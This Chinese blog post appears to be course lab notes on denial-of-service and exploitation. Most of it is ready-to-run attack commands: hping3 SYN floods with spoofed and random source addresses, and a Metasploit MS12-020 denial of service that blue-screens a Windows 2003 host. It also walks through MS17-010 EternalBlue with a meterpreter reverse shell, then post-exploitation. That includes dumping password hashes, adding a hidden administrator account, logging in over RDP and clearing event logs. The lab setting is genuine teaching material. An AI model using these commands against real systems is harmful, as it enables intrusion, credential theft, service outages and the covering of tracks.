DoS 拒绝服务攻击/DDoS 分布式拒绝服务攻击5

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接: https://blog.csdn.net/qq_30787727/article/details/100060422

人生没有回头路,你走的每一步都算数!你阳光,世界会因你而温暖!请坚定信念向前!
====================================================
回顾:
       1,接口的默认规则
                       --允许出站连接 ---从高的安全区域访问低的安全区域
                       --禁止入站连接----禁止从低的安全级别访问高的安全级别
                       --禁止相同的安全级别互相通信

        2,用ACL 匹配   -----安全策略
                     实现低的安全级别访问高的安全级别---放行

        3,NAPT   EASYIP   
======================
DOS   拒绝服务
          常见的攻击方式为洪水攻击   如  SYN flood  /ping  flood  
     
          TCP  三次握手    利用其缺陷实现资源占用导致服务器不能正常提供服务 

hping3    -i   发包的时间间隔    1S=1000ms
                                                1ms=1000us
               -a  伪造源地址
               -p  目的端口
               -S   指的使使用SYN flood攻击
               --rand-source   随机源地址
实验环境:   一台KALI    一台2003    互通    打开2003远程桌面功能
root@kali:~# hping3     -i u10      -a 2.2.2.2      -p 3389       -S         192.168.0.129
                                  ------------ ------------  ------------ --------- --------------
                                  间隔10微秒   源地址         目标端口     攻击方式   目标IP
==
冰盾防火墙---软件防火墙  ,能够防御2000多种黑客攻击行为
==
DDOS   分布式 拒绝服务攻击  
            root@kali:~# hping3 -i u10 -p 3389 -S --rand-source 192.168.0.129

==========================
漏洞   ------利用漏洞攻击
          ------利用漏洞入侵

     利用MSF攻击框架实施攻击-----使攻击变得特别容易  
     利用已知的Windows   MS12-020 远程桌面的漏洞实施攻击
实验环境:一台kali   ;一台2003
在2003里 用systeminfo 查看系统信息,看漏洞补丁是否安全,如果安装控制面板--卸载程序-卸载更新补丁

在KALI操作:
root@kali:~# msfconsole //进入到MSF攻击框架
msf > search dos             //搜索所有的漏洞
msf > search ms12-020   //查询MS12-020漏洞
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids  //应用该漏洞
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > show options   //查看漏洞选项信息
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > set rhost 192.168.0.129  
                                                                                                                          //设置攻击的目标主机
msf auxiliary(dos/windows/rdp/ms12_020_maxchannelids) > run  //执行

2003现象:蓝屏

----------------
利用漏洞入侵 :利用MS17-010    -----勒索病毒     
                        利用MSF攻击框架
                        利用meterpreter 渗透工具实施渗透

实验环境:一台KALI   ;一台WIN7

root@kali:~# msfconsole  //利用攻击框架
msf > search dos   //查找系统所有漏洞
msf > search ms17-010  //查看ms17-010漏洞
msf > use exploit/windows/smb/ms17_010_eternalblue  //应用漏洞
msf exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
                                                                         //设置反弹端口,使远程主机连接到此端口(与渗透工具关联)
msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.10 //设置攻击的目标主机
msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.0.128//设置攻击的源主机
msf exploit(windows/smb/ms17_010_eternalblue) > exploit   //利用
meterpreter > pwd  //进入到渗透视图
----------------------
认证算法:MD5   信息摘要算法     128签名    效率高    安全性比SHA差一点  
                 SHA    安全散列算法      160签名      256     512     ----------保证数据的完整性 /防止篡改
----------------------
meterpreter > hashdump  //获取本地账户和密码-----可以在线MD5加密解密
admin:1000:aad3b435b51404eeaad3b435b51404ee:【32ed87bdb5fdc5e9cba88547376818d4】:::
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
----------------------
meterpreter > screenshot   //截图
----------------------
启动远程桌面--远程登陆
meterpreter > run getgui -e 启动gui程序
meterpreter > shell  //进入到shell视图(及win7系统命令行下)
C:\Windows\system32>net user tedu tedu /add  //创建用户及密码
C:\Windows\system32>net localgroup administrators tedu /add  //将tedu账户加入到管理员组
C:\Windows\system32>net localgroup "Remote Desktop Users" tedu /add //将tedu账户加入到远程登陆组

进入到win7系统查看下:计算机右键---管理---用户和组--用户账户
--------
新建终端:远程登陆到win7
root@kali:~# rdesktop -u tedu -p tedu 192.168.0.10:3389
--------
C:\Windows\system32>exit
meterpreter > clearev   //清除日志
==============================
openvas    免费的   开源的   扫描工具  ------目标主机----常用的漏扫工具

下载----耗时
安装----耗时 

openvast-start  打开

----新建扫描任务
----查看扫描结果


         


 

猜你喜欢

转载自blog.csdn.net/qq_30787727/article/details/100060422